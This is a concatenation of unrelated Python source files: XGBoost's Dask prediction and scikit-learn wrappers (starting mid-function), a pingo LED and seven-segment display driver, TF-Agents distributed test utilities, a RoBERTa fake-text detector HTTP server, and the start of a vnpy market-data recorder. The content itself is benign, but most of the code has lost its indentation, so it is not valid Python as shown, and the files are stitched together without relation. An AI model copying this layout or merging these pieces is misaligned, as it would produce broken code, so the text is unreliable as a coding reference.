else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, (DaskDMatrix, da.Array, dd.DataFrame)):
raise TypeError(_expect([DaskDMatrix, da.Array, dd.DataFrame],
type(data)))
def mapped_predict(partition, is_df):
worker = distributed_get_worker()
booster.set_param({'nthread': worker.nthreads})
m = DMatrix(partition, missing=missing, nthread=worker.nthreads)
predt = booster.predict(m, *args, validate_features=False)
if is_df:
if lazy_isinstance(partition, 'cudf', 'core.dataframe.DataFrame'):
import cudf # pylint: disable=import-error
predt = cudf.DataFrame(predt, columns=['prediction'])
else:
predt = DataFrame(predt, columns=['prediction'])
return predt
# Predict on dask collection directly.
if isinstance(data, (da.Array, dd.DataFrame)):
return await _direct_predict_impl(client, data, mapped_predict)
# Prediction on dask DMatrix.
worker_map = data.worker_map
partition_order = data.partition_order
feature_names = data.feature_names
feature_types = data.feature_types
missing = data.missing
def dispatched_predict(worker_id):
'''Perform prediction on each worker.'''
LOGGER.info('Predicting on %d', worker_id)
worker = distributed_get_worker()
list_of_parts = _get_worker_x_ordered(worker_map, partition_order,
worker)
predictions = []
booster.set_param({'nthread': worker.nthreads})
for part, order in list_of_parts:
local_x = DMatrix(part, feature_names=feature_names,
feature_types=feature_types,
missing=missing, nthread=worker.nthreads)
predt = booster.predict(data=local_x,
validate_features=local_x.num_row() != 0,
*args)
columns = 1 if len(predt.shape) == 1 else predt.shape[1]
ret = ((delayed(predt), columns), order)
predictions.append(ret)
return predictions
def dispatched_get_shape(worker_id):
'''Get shape of data in each worker.'''
LOGGER.info('Get shape on %d', worker_id)
worker = distributed_get_worker()
list_of_parts = _get_worker_x_ordered(worker_map,
partition_order, worker)
shapes = [(part.shape, order) for part, order in list_of_parts]
return shapes
async def map_function(func):
'''Run function for each part of the data.'''
futures = []
for wid in range(len(worker_map)):
list_of_workers = [list(worker_map.keys())[wid]]
f = await client.submit(func, wid,
pure=False,
workers=list_of_workers)
futures.append(f)
# Get delayed objects
results = await client.gather(futures)
results = [t for l in results for t in l] # flatten into 1 dim list
# sort by order, l[0] is the delayed object, l[1] is its order
results = sorted(results, key=lambda l: l[1])
results = [predt for predt, order in results] # remove order
return results
results = await map_function(dispatched_predict)
shapes = await map_function(dispatched_get_shape)
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
arrays = []
for i, shape in enumerate(shapes):
arrays.append(da.from_delayed(
results[i][0], shape=(shape[0],)
if results[i][1] == 1 else (shape[0], results[i][1]),
dtype=numpy.float32))
predictions = await da.concatenate(arrays, axis=0)
return predictions
def predict(client, model, data, *args, missing=numpy.nan):
'''Run prediction with a trained booster.
.. note::
Only default prediction mode is supported right now.
.. versionadded:: 1.0.0
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model: A Booster or a dictionary returned by `xgboost.dask.train`.
The trained model.
data: DaskDMatrix/dask.dataframe.DataFrame/dask.array.Array
Input data used for prediction.
missing: float
Used when input data is not DaskDMatrix. Specify the value
considered as missing.
Returns
-------
prediction: dask.array.Array/dask.dataframe.Series
'''
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(_predict_async, client, model, data, *args,
missing=missing)
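# Illustrative sketch: `model` may be a Booster or the dict returned by
# ``train``; `data` may be a DaskDMatrix or a dask collection, in which
# case prediction is mapped over the partitions directly.
def _predict_example(client, output, X):
    dtest = DaskDMatrix(client, X)
    from_dmatrix = predict(client, output, dtest)
    direct = predict(client, output['booster'], X)
    return from_dmatrix, direct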
async def _inplace_predict_async(client, model, data,
iteration_range=(0, 0),
predict_type='value',
missing=numpy.nan):
client = _xgb_get_client(client)
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, (da.Array, dd.DataFrame)):
raise TypeError(_expect([da.Array, dd.DataFrame], type(data)))
def mapped_predict(data, is_df):
worker = distributed_get_worker()
booster.set_param({'nthread': worker.nthreads})
prediction = booster.inplace_predict(
data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing)
if is_df:
if lazy_isinstance(data, 'cudf.core.dataframe', 'DataFrame'):
import cudf # pylint: disable=import-error
prediction = cudf.DataFrame({'prediction': prediction},
dtype=numpy.float32)
else:
# If it's from pandas, the partition is a numpy array
prediction = DataFrame(prediction, columns=['prediction'],
dtype=numpy.float32)
return prediction
return await _direct_predict_impl(client, data, mapped_predict)
def inplace_predict(client, model, data,
iteration_range=(0, 0),
predict_type='value',
missing=numpy.nan):
'''Inplace prediction.
.. versionadded:: 1.1.0
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model: Booster/dict
The trained model.
iteration_range: tuple
Specify the range of trees used for prediction.
predict_type: str
* 'value': Normal prediction result.
* 'margin': Output the raw untransformed margin value.
missing: float
Value in the input data which needs to be present as a missing
value. If None, defaults to np.nan.
Returns
-------
prediction: dask.array.Array
'''
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(_inplace_predict_async, client, model=model, data=data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing)
async def _evaluation_matrices(client, validation_set,
sample_weights, missing):
'''
Parameters
----------
validation_set: list of tuples
Each tuple contains a validation dataset including input X and label y.
E.g.:
.. code-block:: python
[(X_0, y_0), (X_1, y_1), ... ]
sample_weights: list of arrays
The weight vector for validation data.
Returns
-------
evals: list of validation DMatrix
'''
evals = []
if validation_set is not None:
assert isinstance(validation_set, list)
for i, e in enumerate(validation_set):
w = (sample_weights[i]
if sample_weights is not None else None)
dmat = await DaskDMatrix(client=client, data=e[0], label=e[1],
weight=w, missing=missing)
evals.append((dmat, 'validation_{}'.format(i)))
else:
evals = None
return evals
class DaskScikitLearnBase(XGBModel):
'''Base class for implementing scikit-learn interface with Dask'''
_client = None
# pylint: disable=arguments-differ
def fit(self, X, y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
'''Fit the regressor.
Parameters
----------
X : array_like
Feature matrix
y : array_like
Labels
sample_weights : array_like
instance weights
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of group weights on the i-th validation set.
verbose : bool
If `verbose` and an evaluation set is used, writes the evaluation
metric measured on the validation set to stderr.'''
raise NotImplementedError
def predict(self, data): # pylint: disable=arguments-differ
'''Predict with `data`.
Parameters
----------
data: data that can be used to construct a DaskDMatrix
Returns
-------
prediction : dask.array.Array'''
raise NotImplementedError
def __await__(self):
# Generate a coroutine wrapper to make this class awaitable.
async def _():
return self
return self.client.sync(_).__await__()
@property
def client(self):
'''The dask client used in this model.'''
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt):
self._client = clt
@xgboost_model_doc("""Implementation of the Scikit-Learn API for XGBoost.""",
['estimators', 'model'])
class DaskXGBRegressor(DaskScikitLearnBase, XGBRegressorBase):
# pylint: disable=missing-class-docstring
async def _fit_async(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
dtrain = await DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights,
missing=self.missing)
params = self.get_xgb_params()
evals = await _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set,
self.missing)
results = await train(client=self.client, params=params, dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals, verbose_eval=verbose)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
# pylint: disable=missing-docstring
def fit(self, X, y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
_assert_dask_support()
return self.client.sync(self._fit_async, X, y, sample_weights,
eval_set, sample_weight_eval_set,
verbose)
async def _predict_async(self, data): # pylint: disable=arguments-differ
test_dmatrix = await DaskDMatrix(client=self.client, data=data,
missing=self.missing)
pred_probs = await predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
def predict(self, data):
_assert_dask_support()
return self.client.sync(self._predict_async, data)
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model']
)
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
async def _fit_async(self, X, y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
dtrain = await DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights,
missing=self.missing)
params = self.get_xgb_params()
# pylint: disable=attribute-defined-outside-init
if isinstance(y, (da.Array)):
self.classes_ = await self.client.compute(da.unique(y))
else:
self.classes_ = await self.client.compute(y.drop_duplicates())
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
evals = await _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set,
self.missing)
results = await train(client=self.client, params=params, dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals, verbose_eval=verbose)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
def fit(self, X, y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
_assert_dask_support()
return self.client.sync(self._fit_async, X, y, sample_weights,
eval_set, sample_weight_eval_set, verbose)
async def _predict_proba_async(self, data):
_assert_dask_support()
test_dmatrix = await DaskDMatrix(client=self.client, data=data,
missing=self.missing)
pred_probs = await predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
def predict_proba(self, data): # pylint: disable=arguments-differ,missing-docstring
_assert_dask_support()
return self.client.sync(self._predict_proba_async, data)
async def _predict_async(self, data):
_assert_dask_support()
test_dmatrix = await DaskDMatrix(client=self.client, data=data,
missing=self.missing)
pred_probs = await predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
if self.n_classes_ == 2:
preds = (pred_probs > 0.5).astype(int)
else:
preds = da.argmax(pred_probs, axis=1)
return preds
def predict(self, data): # pylint: disable=arguments-differ
_assert_dask_support()
return self.client.sync(self._predict_async, data)
|
led.py
|
import pingo
import time
import threading
class Led(object):
"""A single LED"""
def __init__(self, pin, lit_state=pingo.HIGH):
"""Set lit_state to pingo.LOW to turn on led by bringing
cathode to low state.
:param lit_state: use pingo.HIGH for anode control, pingo.LOW
for cathode control
"""
pin.mode = pingo.OUT
self.pin = pin
self.lit_state = lit_state
self.blink_task = None
def on(self):
if self.lit_state == pingo.HIGH:
self.pin.high()
else:
self.pin.low()
def off(self):
if self.lit_state == pingo.HIGH:
self.pin.low()
else:
self.pin.high()
@property
def lit(self):
return self.pin.state == self.lit_state
@lit.setter
def lit(self, new_state):
if new_state:
self.on()
else:
self.off()
@property
def blinking(self):
return self.blink_task is not None and self.blink_task.active
def toggle(self):
self.pin.toggle()
def blink(self, times=3, on_delay=.5, off_delay=None):
"""
:param times: number of times to blink (0=forever)
:param on_delay: delay while LED is on
:param off_delay: delay while LED is off
"""
if self.blinking:
self.stop()
self.blink_task = BlinkTask(self, times, on_delay, off_delay)
threading.Thread(target=self.blink_task.run).start()
def stop(self):
"""Stop blinking"""
if self.blinking:
self.blink_task.terminate()
self.blink_task = None
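# Usage sketch (hypothetical; assumes a pingo board is available, e.g. via
# `pingo.detect.get_board()`, and that pin 13 drives an LED):
def _led_demo():
    board = pingo.detect.get_board()
    led = Led(board.pins[13])
    led.blink(times=5, on_delay=.2)  # toggles in a background thread
    time.sleep(3)
    led.stop()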
PURE_COLORS = [
('RED', [1, 0, 0]),
('YELLOW', [1, 1, 0]),
('GREEN', [0, 1, 0]),
('CYAN', [0, 1, 1]),
('BLUE', [0, 0, 1]),
('PURPLE', [1, 0, 1]),
('WHITE', [1, 1, 1]),
('BLACK', [0, 0, 0]),
]
class RGBLed(object):
pure_colors_map = dict(PURE_COLORS)
def __init__(self, red_pin, green_pin, blue_pin,
lit_state=pingo.LOW):
self._leds = [Led(red_pin, lit_state), Led(green_pin, lit_state),
Led(blue_pin, lit_state)]
self.color = 'BLACK'
@property
def color(self):
return self._color
@color.setter
def color(self, new_color):
new_color = new_color.upper()
if new_color in RGBLed.pure_colors_map:
self._color = new_color
states = RGBLed.pure_colors_map[new_color]
for led, state in zip(self._leds, states):
led.lit = state
else:
raise ValueError('Unknown color: %s' % new_color)
def cycle(self, delay=.15):
colors = PURE_COLORS[:6] # exclude white and black
for color, _ in colors:
self.color = color
time.sleep(delay)
class BlinkTask(object):
def __init__(self, led, times, on_delay, off_delay):
"""
:param led: Led instance to blink
:param times: number of times to blink (0=forever)
:param on_delay: delay while LED is on
:param off_delay: delay while LED is off
"""
self.led = led
self.led_pin_state_initial = self.led.pin.state
self.active = True
self.forever = times == 0
self.times_remaining = times
self.on_delay = on_delay
self.off_delay = off_delay if off_delay is not None else on_delay
self.led.off()
def terminate(self):
self.active = False
def run(self):
while self.active and (self.forever or self.times_remaining):
self.led.toggle()
if self.led.lit:
time.sleep(self.on_delay)
if not self.forever:
self.times_remaining -= 1
else:
time.sleep(self.off_delay)
else:
self.led.pin.state = self.led_pin_state_initial
self.active = False
DIGIT_MAP = {
0: '1111110',
1: '0110000',
2: '1101101',
3: '1111001',
4: '0110011',
5: '1011011',
6: '1011111',
7: '1110000',
8: '1111111',
9: '1111011',
10: '1110111',
11: '0011111',
12: '1001110',
13: '0111101',
14: '1001111',
15: '1000111',
'G': '1011110', # to spell GAr0A
'r': '0000101', # to spell GAr0A
}
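# Pattern layout (inferred from `SevenSegments._configure` below): one
# character per segment in the order a, b, c, d, e, f, g, where '1' lights
# the segment. For example, DIGIT_MAP[2] == '1101101' lights segments
# a, b, d, e and g, which draws a "2".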
class SevenSegments(object):
def __init__(self, pin_a, pin_b, pin_c, pin_d,
pin_e, pin_f, pin_g, pin_dp=None,
lit_state=pingo.HIGH):
self._leds = [Led(pin_a, lit_state), Led(pin_b, lit_state),
Led(pin_c, lit_state), Led(pin_d, lit_state),
Led(pin_e, lit_state), Led(pin_f, lit_state),
Led(pin_g, lit_state)]
if pin_dp:
self._leds.append(Led(pin_dp, lit_state))
self._digit = 0
self._dot = False
def _configure(self, pattern):
for segment, state in zip(self._leds, pattern):
segment.lit = state == '1'
@property
def digit(self):
return self._digit
@digit.setter
def digit(self, digit):
self._digit = digit
pattern = DIGIT_MAP[digit]
self._configure(pattern)
def on(self):
self.digit = self._digit
def off(self):
self._configure('0' * 7)
@property
def dot(self):
return self._dot
@dot.setter
def dot(self, state):
if len(self._leds) < 8:
raise LookupError('Decimal point LED undefined')
if state:
self._dot = True
self._leds[7].on()
else:
self._dot = False
self._leds[7].off()
|
test_utils.py
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Utils for running distributed actor/learner tests."""
import functools
from absl import logging
import numpy as np
import reverb
import tensorflow.compat.v2 as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.agents.dqn import dqn_agent
from tf_agents.agents.ppo import ppo_clip_agent
from tf_agents.environments import suite_gym
from tf_agents.experimental.distributed import reverb_variable_container
from tf_agents.experimental.train import actor
from tf_agents.experimental.train.utils import replay_buffer_utils
from tf_agents.experimental.train.utils import spec_utils
from tf_agents.experimental.train.utils import train_utils
from tf_agents.networks import actor_distribution_network
from tf_agents.networks import sequential
from tf_agents.networks import value_network
from tf_agents.policies import py_tf_eager_policy
from tf_agents.replay_buffers import reverb_replay_buffer
from tf_agents.specs import tensor_spec
from tf_agents.trajectories import time_step as ts
from tf_agents.trajectories import trajectory
def configure_logical_cpus():
"""Configures exactly 4 logical CPUs for the first physical CPU.
Assumes no logical configuration exists or it was configured the same way.
**Note**: The number of logical CPUs is fixed because reconfiguring them
once the underlying runtime has been initialized is not supported (it
raises `RuntimeError`). Fixing the count ensures that tests running in the
same process and calling this function multiple times do not break.
"""
first_cpu = tf.config.list_physical_devices('CPU')[0]
try:
logical_devices = [
tf.config.experimental.VirtualDeviceConfiguration() for _ in range(4)
]
tf.config.experimental.set_virtual_device_configuration(
first_cpu, logical_devices=logical_devices)
logging.info(
'No current virtual device configuration. Defining 4 virtual CPUs on '
'the first physical one.')
except RuntimeError:
current_config = tf.config.experimental.get_virtual_device_configuration(
first_cpu)
logging.warn(
'The following virtual device configuration already exists: %s, which '
'caused this call to fail with `RuntimeError` since virtual devices '
'cannot be reconfigured after runtime initialization. This is '
'probably safe to ignore.', current_config)
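# Illustrative check of the resulting configuration: after the call, the
# runtime should expose four logical CPU devices.
#
#   configure_logical_cpus()
#   assert len(tf.config.list_logical_devices('CPU')) == 4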
def get_cartpole_env_and_specs():
env = suite_gym.load('CartPole-v0')
_, action_tensor_spec, time_step_tensor_spec = (
spec_utils.get_tensor_specs(env))
return env, action_tensor_spec, time_step_tensor_spec
def build_dummy_sequential_net(fc_layer_params, action_spec):
"""Build a dummy sequential network."""
num_actions = action_spec.maximum - action_spec.minimum + 1
logits = functools.partial(
tf.keras.layers.Dense,
activation=None,
kernel_initializer=tf.random_uniform_initializer(
minval=-0.03, maxval=0.03),
bias_initializer=tf.constant_initializer(-0.2))
dense = functools.partial(
tf.keras.layers.Dense,
activation=tf.keras.activations.relu,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(
scale=2.0, mode='fan_in', distribution='truncated_normal'))
return sequential.Sequential(
[dense(num_units) for num_units in fc_layer_params]
+ [logits(num_actions)])
def create_ppo_agent_and_dataset_fn(action_spec, time_step_spec, train_step,
batch_size):
"""Builds and returns a dummy PPO Agent, dataset and dataset function."""
del action_spec # Unused.
del time_step_spec # Unused.
del batch_size # Unused.
# No arbitrary spec supported.
obs_spec = tensor_spec.TensorSpec([2], tf.float32)
ts_spec = ts.time_step_spec(obs_spec)
act_spec = tensor_spec.BoundedTensorSpec([1], tf.float32, -1, 1)
actor_net = actor_distribution_network.ActorDistributionNetwork(
obs_spec,
act_spec,
fc_layer_params=(100,),
activation_fn=tf.keras.activations.tanh)
value_net = value_network.ValueNetwork(
obs_spec, fc_layer_params=(100,), activation_fn=tf.keras.activations.tanh)
agent = ppo_clip_agent.PPOClipAgent(
ts_spec,
act_spec,
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),
actor_net=actor_net,
value_net=value_net,
entropy_regularization=0.0,
importance_ratio_clipping=0.2,
normalize_observations=False,
normalize_rewards=False,
use_gae=False,
use_td_lambda_return=False,
num_epochs=1,
debug_summaries=False,
summarize_grads_and_vars=False,
train_step_counter=train_step,
compute_value_and_advantage_in_train=False)
def _create_experience(_):
observations = tf.constant([
[[1, 2], [3, 4], [5, 6]],
[[1, 2], [3, 4], [5, 6]],
],
dtype=tf.float32)
mid_time_step_val = ts.StepType.MID.tolist()
time_steps = ts.TimeStep(
step_type=tf.constant([[mid_time_step_val] * 3] * 2, dtype=tf.int32),
reward=tf.constant([[1] * 3] * 2, dtype=tf.float32),
discount=tf.constant([[1] * 3] * 2, dtype=tf.float32),
observation=observations)
actions = tf.constant([[[0], [1], [1]], [[0], [1], [1]]], dtype=tf.float32)
action_distribution_parameters = {
'loc': tf.constant([[[0.0]] * 3] * 2, dtype=tf.float32),
'scale': tf.constant([[[1.0]] * 3] * 2, dtype=tf.float32),
}
value_preds = tf.constant([[9., 15., 21.], [9., 15., 21.]],
dtype=tf.float32)
policy_info = {
'dist_params': action_distribution_parameters,
}
policy_info['value_prediction'] = value_preds
experience = trajectory.Trajectory(time_steps.step_type, observations,
actions, policy_info,
time_steps.step_type, time_steps.reward,
time_steps.discount)
return agent._preprocess(experience) # pylint: disable=protected-access
dataset = tf.data.Dataset.from_tensor_slices([[i] for i in range(100)
]).map(_create_experience)
dataset = tf.data.Dataset.zip((dataset, tf.data.experimental.Counter()))
dataset_fn = lambda: dataset
return agent, dataset, dataset_fn, agent.training_data_spec
def create_dqn_agent_and_dataset_fn(action_spec, time_step_spec, train_step,
batch_size):
"""Builds and returns a dataset function for DQN Agent."""
q_net = build_dummy_sequential_net(fc_layer_params=(100,),
action_spec=action_spec)
agent = dqn_agent.DqnAgent(
time_step_spec,
action_spec,
q_network=q_net,
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),
train_step_counter=train_step)
agent.initialize()
def make_item(_):
traj = tensor_spec.sample_spec_nest(
agent.collect_data_spec, seed=123, outer_dims=[2])
def scale_observation_only(item):
# Scale float values in the sampled item by large value to avoid NaNs.
if item.dtype == tf.float32:
return tf.math.divide(item, 1.e+22)
else:
return item
return tf.nest.map_structure(scale_observation_only, traj)
l = []
for i in range(100):
l.append([i])
dataset = tf.data.Dataset.zip(
(tf.data.Dataset.from_tensor_slices(l).map(make_item),
tf.data.experimental.Counter()))
dataset_fn = lambda: dataset.batch(batch_size)
return agent, dataset, dataset_fn, agent.collect_data_spec
def build_actor(root_dir, env, agent, rb_observer, train_step):
"""Builds the Actor."""
tf_collect_policy = agent.collect_policy
collect_policy = py_tf_eager_policy.PyTFEagerPolicy(
tf_collect_policy, use_tf_function=True)
temp_dir = root_dir + 'actor'
test_actor = actor.Actor(
env,
collect_policy,
train_step,
steps_per_run=1,
metrics=actor.collect_metrics(10),
summary_dir=temp_dir,
observers=[rb_observer])
return test_actor
def get_actor_thread(test_case, reverb_server_port, num_iterations=10):
"""Returns a thread that runs an Actor."""
def build_and_run_actor():
root_dir = test_case.create_tempdir().full_path
env, action_tensor_spec, time_step_tensor_spec = (
get_cartpole_env_and_specs())
train_step = train_utils.create_train_step()
q_net = build_dummy_sequential_net(fc_layer_params=(100,),
action_spec=action_tensor_spec)
agent = dqn_agent.DqnAgent(
time_step_tensor_spec,
action_tensor_spec,
q_network=q_net,
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),
train_step_counter=train_step)
_, rb_observer = (
replay_buffer_utils.get_reverb_buffer_and_observer(
agent.collect_data_spec,
table_name=reverb_replay_buffer.DEFAULT_TABLE,
sequence_length=2,
reverb_server_address='localhost:{}'.format(reverb_server_port)))
variable_container = reverb_variable_container.ReverbVariableContainer(
server_address='localhost:{}'.format(reverb_server_port),
table_names=[reverb_variable_container.DEFAULT_TABLE])
test_actor = build_actor(
root_dir, env, agent, rb_observer, train_step)
variables_dict = {
reverb_variable_container.POLICY_KEY: agent.collect_policy.variables(),
reverb_variable_container.TRAIN_STEP_KEY: train_step
}
variable_container.update(variables_dict)
for _ in range(num_iterations):
test_actor.run()
actor_thread = test_case.checkedThread(target=build_and_run_actor)
return actor_thread
def check_variables_different(test_case, old_vars_numpy, new_vars_numpy):
"""Tests whether the two sets of variables are different.
Useful for checking if variables were updated, i.e. a train step was run.
Args:
test_case: an instance of tf.test.TestCase for assertions
old_vars_numpy: numpy representation of old variables
new_vars_numpy: numpy representation of new variables
"""
# Check if there is a change.
def changed(a, b):
return not np.equal(a, b).all()
vars_changed = tf.nest.flatten(
tf.nest.map_structure(changed, old_vars_numpy, new_vars_numpy))
# Assert that at least one variable changed.
test_case.assertTrue(np.any(vars_changed))
def create_reverb_server_for_replay_buffer_and_variable_container(
collect_policy, train_step, replay_buffer_capacity, port):
"""Sets up one reverb server for replay buffer and variable container."""
# Create the signature for the variable container holding the policy weights.
variables = {
reverb_variable_container.POLICY_KEY: collect_policy.variables(),
reverb_variable_container.TRAIN_STEP_KEY: train_step
}
variable_container_signature = tf.nest.map_structure(
lambda variable: tf.TensorSpec(variable.shape, dtype=variable.dtype),
variables)
# Create the signature for the replay buffer holding observed experience.
replay_buffer_signature = tensor_spec.from_spec(
collect_policy.collect_data_spec)
# Create and start the replay buffer and variable container server.
server = reverb.Server(
tables=[
reverb.Table( # Replay buffer storing experience.
name=reverb_replay_buffer.DEFAULT_TABLE,
sampler=reverb.selectors.Uniform(),
remover=reverb.selectors.Fifo(),
# TODO(b/159073060): Set rate limiter for SAC properly.
rate_limiter=reverb.rate_limiters.MinSize(1),
max_size=replay_buffer_capacity,
max_times_sampled=0,
signature=replay_buffer_signature,
),
reverb.Table( # Variable container storing policy parameters.
name=reverb_variable_container.DEFAULT_TABLE,
sampler=reverb.selectors.Uniform(),
remover=reverb.selectors.Fifo(),
rate_limiter=reverb.rate_limiters.MinSize(1),
max_size=1,
max_times_sampled=0,
signature=variable_container_signature,
),
],
port=port)
return server
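# Illustrative wiring of the helpers above (hypothetical helper; the port
# choice is arbitrary): build an agent, start the reverb server for it,
# and spin up an actor thread against that server.
def _example_learner_setup(test_case, port=8008):
    _, action_spec, time_step_spec = get_cartpole_env_and_specs()
    train_step = train_utils.create_train_step()
    agent, _, _, _ = create_dqn_agent_and_dataset_fn(
        action_spec, time_step_spec, train_step, batch_size=2)
    server = create_reverb_server_for_replay_buffer_and_variable_container(
        agent.collect_policy, train_step, replay_buffer_capacity=100,
        port=port)
    actor_thread = get_actor_thread(test_case, port)
    return server, actor_thread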
|
server.py
|
import json
import os
import subprocess
import sys
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing import Process
from urllib.parse import unquote, urlparse
import fire
import torch
from transformers import RobertaForSequenceClassification, RobertaTokenizer
model: RobertaForSequenceClassification = None
tokenizer: RobertaTokenizer = None
device: str = None
def log(*args):
print(f"[{os.environ.get('RANK', '')}]", *args, file=sys.stderr)
class RequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
query = unquote(urlparse(self.path).query)
if not query:
self.begin_content('text/html')
html = os.path.join(os.path.dirname(__file__), 'index.html')
self.wfile.write(open(html).read().encode())
return
self.begin_content('application/json;charset=UTF-8')
tokens = tokenizer.encode(query)
all_tokens = len(tokens)
tokens = tokens[:tokenizer.max_len - 2]
used_tokens = len(tokens)
tokens = torch.tensor([tokenizer.bos_token_id] + tokens + [tokenizer.eos_token_id]).unsqueeze(0)
mask = torch.ones_like(tokens)
with torch.no_grad():
logits = model(tokens.to(device), attention_mask=mask.to(device))[0]
probs = logits.softmax(dim=-1)
fake, real = probs.detach().cpu().flatten().numpy().tolist()
self.wfile.write(json.dumps(dict(
all_tokens=all_tokens,
used_tokens=used_tokens,
real_probability=real,
fake_probability=fake
)).encode())
def begin_content(self, content_type):
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Access-Control-Allow-Origin', '*')
self.end_headers()
def log_message(self, format, *args):
log(format % args)
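# Example interaction (illustrative; the probabilities shown are made up):
# the URL query string is the text to score, e.g.
#
#   curl 'http://localhost:8080/?Some%20text%20to%20score'
#
# returns JSON of the form
#
#   {"all_tokens": 4, "used_tokens": 4,
#    "real_probability": 0.97, "fake_probability": 0.03}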
def serve_forever(server, model, tokenizer, device):
log('Process has started; loading the model ...')
globals()['model'] = model.to(device)
globals()['tokenizer'] = tokenizer
globals()['device'] = device
log(f'Ready to serve at http://localhost:{server.server_address[1]}')
server.serve_forever()
def main(checkpoint, port=8080, device='cuda' if torch.cuda.is_available() else 'cpu'):
if checkpoint.startswith('gs://'):
print(f'Downloading {checkpoint}', file=sys.stderr)
subprocess.check_output(['gsutil', 'cp', checkpoint, '.'])
checkpoint = os.path.basename(checkpoint)
assert os.path.isfile(checkpoint)
print(f'Loading checkpoint from {checkpoint}')
data = torch.load(checkpoint, map_location='cpu')
model_name = 'roberta-large' if data['args']['large'] else 'roberta-base'
model = RobertaForSequenceClassification.from_pretrained(model_name)
tokenizer = RobertaTokenizer.from_pretrained(model_name)
model.load_state_dict(data['model_state_dict'])
model.eval()
print(f'Starting HTTP server on port {port}', file=sys.stderr)
server = HTTPServer(('0.0.0.0', port), RequestHandler)
# avoid calling CUDA API before forking; doing so in a subprocess is fine.
# print(subprocess.check_output([sys.executable, '-c', 'import torch; print(torch.cuda.device_count())']))
# num_workers = int(subprocess.check_output([sys.executable, '-c', 'import torch; print(torch.cuda.device_count())']))
num_workers = 0
if num_workers <= 1:
serve_forever(server, model, tokenizer, device)
else:
print(f'Launching {num_workers} worker processes...')
subprocesses = []
for i in range(num_workers):
os.environ['RANK'] = f'{i}'
os.environ['CUDA_VISIBLE_DEVICES'] = f'{i}'
process = Process(target=serve_forever, args=(server, model, tokenizer, device))
process.start()
subprocesses.append(process)
del os.environ['RANK']
del os.environ['CUDA_VISIBLE_DEVICES']
for process in subprocesses:
process.join()
if __name__ == '__main__':
fire.Fire(main)
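# Example invocation (hypothetical checkpoint path), exposed as a CLI by fire:
#   python server.py detector-base.pt --port 8080 --device cpu
# and a sample query against the running server:
#   curl 'http://localhost:8080/?Text to score'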
|
drEngine.py
|
# encoding: UTF-8
'''
This module implements the market data recorder engine: it aggregates TICK
data, generates minute bars (K-lines), and inserts both into the database.
Contracts to record, and dominant-contract code mappings, are configured
via DR_setting.json.
'''
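# A minimal illustrative DR_setting.json, inferred from loadSetting() below;
# symbols and gateway names are hypothetical. Tick/bar entries are lists of
# [symbol, gatewayName, exchange (optional), currency (optional),
# productClass (optional)]; 'active' maps dominant code -> specific contract.
#
# {
#     "working": true,
#     "tick": [["IF1604", "CTP"]],
#     "bar": [["IF1604", "CTP"]],
#     "active": {"IF0000": "IF1604"}
# }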
import json
import os
import copy
from collections import OrderedDict
from datetime import datetime, timedelta
from Queue import Queue, Empty
from threading import Thread
from eventEngine import *
from vtGateway import VtSubscribeReq, VtLogData
from drBase import *
from vtFunction import todayDate
########################################################################
class DrEngine(object):
"""数据记录引擎"""
settingFileName = 'DR_setting.json'
path = os.path.abspath(os.path.dirname(__file__))
settingFileName = os.path.join(path, settingFileName)
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine):
"""Constructor"""
